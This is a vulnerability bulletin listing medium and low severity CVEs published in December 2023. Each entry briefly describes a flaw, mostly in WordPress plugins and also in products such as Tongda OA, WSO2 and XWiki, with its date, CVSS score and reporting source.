tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7023
cna@vuldb.com
uffizio — gps_tracker An Open Redirection vulnerability in all versions of Uffizio’s GPS Tracker allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. 2023-12-16 6.1 CVE-2020-17484
cve@mitre.org
uyumsoft — lioxerp Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146. 2023-12-21 6.1 CVE-2023-5988
iletisim@usom.gov.tr
uyumsoft — lioxerp Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146. 2023-12-21 5.4 CVE-2023-5989
iletisim@usom.gov.tr
w3m — w3m An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition. 2023-12-21 5.5 CVE-2023-4255
secalert@redhat.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1. 2023-12-18 6.5 CVE-2022-40312
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8. 2023-12-21 6.5 CVE-2022-45377
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6. 2023-12-20 6.7 CVE-2023-28491
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3. 2023-12-21 6.5 CVE-2023-32799
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12. 2023-12-19 6.1 CVE-2023-35883
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3. 2023-12-19 6.1 CVE-2023-37982
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3. 2023-12-19 6.1 CVE-2023-38478
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7. 2023-12-19 6.1 CVE-2023-38481
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49. 2023-12-19 6.1 CVE-2023-40602
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3. 2023-12-19 6.1 CVE-2023-41648
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9. 2023-12-19 6.5 CVE-2023-44991
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SERVIT Software Solutions affiliate-toolkit – WordPress Affiliate Plugin. This issue affects affiliate-toolkit – WordPress Affiliate Plugin: from n/a through 3.3.9. 2023-12-19 6.1 CVE-2023-45105
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2. 2023-12-21 6.5 CVE-2023-47191
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mahlamusa Who Hit The Page – Hit Counter allows SQL Injection. This issue affects Who Hit The Page – Hit Counter: from n/a through 1.4.14.3. 2023-12-18 6.5 CVE-2023-47558
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS. This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3. 2023-12-15 6.1 CVE-2023-49170
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2. 2023-12-15 6.1 CVE-2023-49176
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0. 2023-12-15 6.1 CVE-2023-49177
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0. 2023-12-15 6.1 CVE-2023-49178
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10. 2023-12-15 6.1 CVE-2023-49182
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2. 2023-12-15 6.1 CVE-2023-49183
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7. 2023-12-15 6.1 CVE-2023-49185
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spoonthemes Adifier – Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. 2023-12-15 6.1 CVE-2023-49187
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8. 2023-12-19 6.1 CVE-2023-50376
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Currency.Wiki Currency Converter Widget – Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget – Exchange Rates: from n/a through 3.0.2. 2023-12-21 6.5 CVE-2023-50822
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7. 2023-12-21 6.5 CVE-2023-50823
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021. 2023-12-21 6.5 CVE-2023-50824
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0. 2023-12-21 6.5 CVE-2023-50825
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in VillaTheme CURCY – Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY – Multi Currency for WooCommerce: from n/a through 2.2.0. 2023-12-21 6.5 CVE-2023-50831
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239. 2023-12-21 6.5 CVE-2023-50833
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2. 2023-12-21 6.5 CVE-2023-50834
audit@patchstack.com
wordpress — wordpress The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. 2023-12-18 6.1 CVE-2023-5348
contact@wpscan.com
wordpress — wordpress The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated user, such as a subscriber, to access the content of arbitrary posts, such as private, draft and password-protected ones. 2023-12-18 6.5 CVE-2023-6077
contact@wpscan.com
wordpress — wordpress The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘et_pb_text’ shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 6.4 CVE-2023-6744
security@wordfence.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker – Popup for opt-ins, lead gen, & more. This issue affects Popup Maker – Popup for opt-ins, lead gen, & more: from n/a through 1.17.1. 2023-12-20 5.3 CVE-2022-47597
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7. 2023-12-20 5.5 CVE-2022-47599
audit@patchstack.com
wordpress — wordpress Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2. 2023-12-21 5.4 CVE-2023-22674
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1. 2023-12-21 5.9 CVE-2023-2487
audit@patchstack.com
wordpress — wordpress Missing Authorization vulnerability in GamiPress GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6. 2023-12-19 5.4 CVE-2023-25715
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin – WP Email Capture. This issue affects WordPress Email Marketing Plugin – WP Email Capture: from n/a through 3.10. 2023-12-21 5.3 CVE-2023-28421
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78. 2023-12-21 5.4 CVE-2023-32747
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12. 2023-12-20 5.4 CVE-2023-36520
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5. 2023-12-20 5.4 CVE-2023-38513
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0. 2023-12-20 5.3 CVE-2023-41796
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5. 2023-12-19 5.3 CVE-2023-44982
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6. 2023-12-19 5.3 CVE-2023-44983
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in A WP Life Event Monster – Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster – Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2. 2023-12-21 5.9 CVE-2023-47525
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5. 2023-12-21 5.9 CVE-2023-47527
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22. 2023-12-15 5.4 CVE-2023-48765
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5. 2023-12-18 5.4 CVE-2023-49148
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6. 2023-12-15 5.4 CVE-2023-49160
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6. 2023-12-21 5.3 CVE-2023-49162
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1. 2023-12-15 5.4 CVE-2023-49165
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. 2023-12-15 5.4 CVE-2023-49169
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. 2023-12-15 5.4 CVE-2023-49174
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. 2023-12-15 5.4 CVE-2023-49175
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6. 2023-12-15 5.4 CVE-2023-49179
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. 2023-12-15 5.4 CVE-2023-49181
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4. 2023-12-15 5.4 CVE-2023-49184
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3. 2023-12-15 5.4 CVE-2023-49747
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite – Create an app with the Best Mobile App Builder. This issue affects AppMySite – Create an app with the Best Mobile App Builder: from n/a through 3.11.0. 2023-12-21 5.3 CVE-2023-49762
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. 2023-12-19 5.3 CVE-2023-49812
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat – WP live chat plugin for WordPress. This issue affects LiveChat – WP live chat plugin for WordPress: from n/a through 4.5.15. 2023-12-18 5.4 CVE-2023-49821
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1. 2023-12-15 5.4 CVE-2023-49823
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2. 2023-12-21 5.9 CVE-2023-50377
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10. 2023-12-21 5.9 CVE-2023-50826
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8. 2023-12-21 5.9 CVE-2023-50827
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in David Vongries Ultimate Dashboard – Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard – Custom WordPress Dashboard: from n/a through 3.7.11. 2023-12-21 5.9 CVE-2023-50828
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3. 2023-12-21 5.9 CVE-2023-50829
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0. 2023-12-21 5.9 CVE-2023-50830
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13. 2023-12-21 5.9 CVE-2023-50832
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1. 2023-12-19 5.4 CVE-2023-50835
audit@patchstack.com
wordpress — wordpress The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘ihrss-gallery’ shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-19 5.4 CVE-2023-5413
security@wordfence.com
wordpress — wordpress The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘jquery-news-ticker’ shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-19 5.4 CVE-2023-5432
security@wordfence.com
wordpress — wordpress The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn’t restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site’s code 2023-12-18 5.3 CVE-2023-6065
contact@wpscan.com
wordpress — wordpress The WP Shortcodes Plugin – Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘su_button’, ‘su_members’, and ‘su_tabs’ shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-19 5.4 CVE-2023-6488
security@wordfence.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2. 2023-12-19 4.3 CVE-2022-43450
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19. 2023-12-19 4.4 CVE-2023-34382
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11. 2023-12-19 4.7 CVE-2023-46624
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. 2023-12-15 4.8 CVE-2023-49180
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. 2023-12-15 4.8 CVE-2023-49188
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12. 2023-12-15 4.8 CVE-2023-49189
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. 2023-12-15 4.8 CVE-2023-49190
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. 2023-12-15 4.8 CVE-2023-49191
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. 2023-12-15 4.8 CVE-2023-49767
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4. 2023-12-15 4.8 CVE-2023-49829
audit@patchstack.com
wordpress — wordpress The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-18 4.8 CVE-2023-5005
contact@wpscan.com
wordpress — wordpress The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens. 2023-12-18 4.3 CVE-2023-6289
contact@wpscan.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post – WP Rating System. This issue affects Rate my Post – WP Rating System: from n/a through 3.4.1. 2023-12-21 4.3 CVE-2023-49765
audit@patchstack.com
wso2 — api_manager Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. 2023-12-15 5.3 CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — api_manager/iot_server Multiple WSO2 products have been identified as vulnerable due to a lack of server-side input validation in the Forum feature; API ratings could be manipulated. 2023-12-15 4.3 CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. 2023-12-15 6.1 CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products Multiple WSO2 products have been identified as vulnerable due to improper output encoding; a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console. 2023-12-18 4.8 CVE-2023-6911
ed10eef1-636d-4fbe-9993-6890dfa878f8
xwiki — xwiki XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki’s regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. 2023-12-15 5.3 CVE-2023-50720
security-advisories@github.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` are vulnerable to a `timing attack` since they are compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.1 CVE-2023-50708
security-advisories@github.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.8 CVE-2023-50714
security-advisories@github.com


Low Vulnerabilities

Primary Vendor — Product Description Published CVSS Score Source & Patch Info
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. 2023-12-15 3.5 CVE-2023-48608
psirt@adobe.com
automad — automad A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packagesstandardtemplatespost.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 2.4 CVE-2023-7035
cna@vuldb.com
code-projects — faculty_management_system A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. 2023-12-22 3.5 CVE-2023-7057
cna@vuldb.com
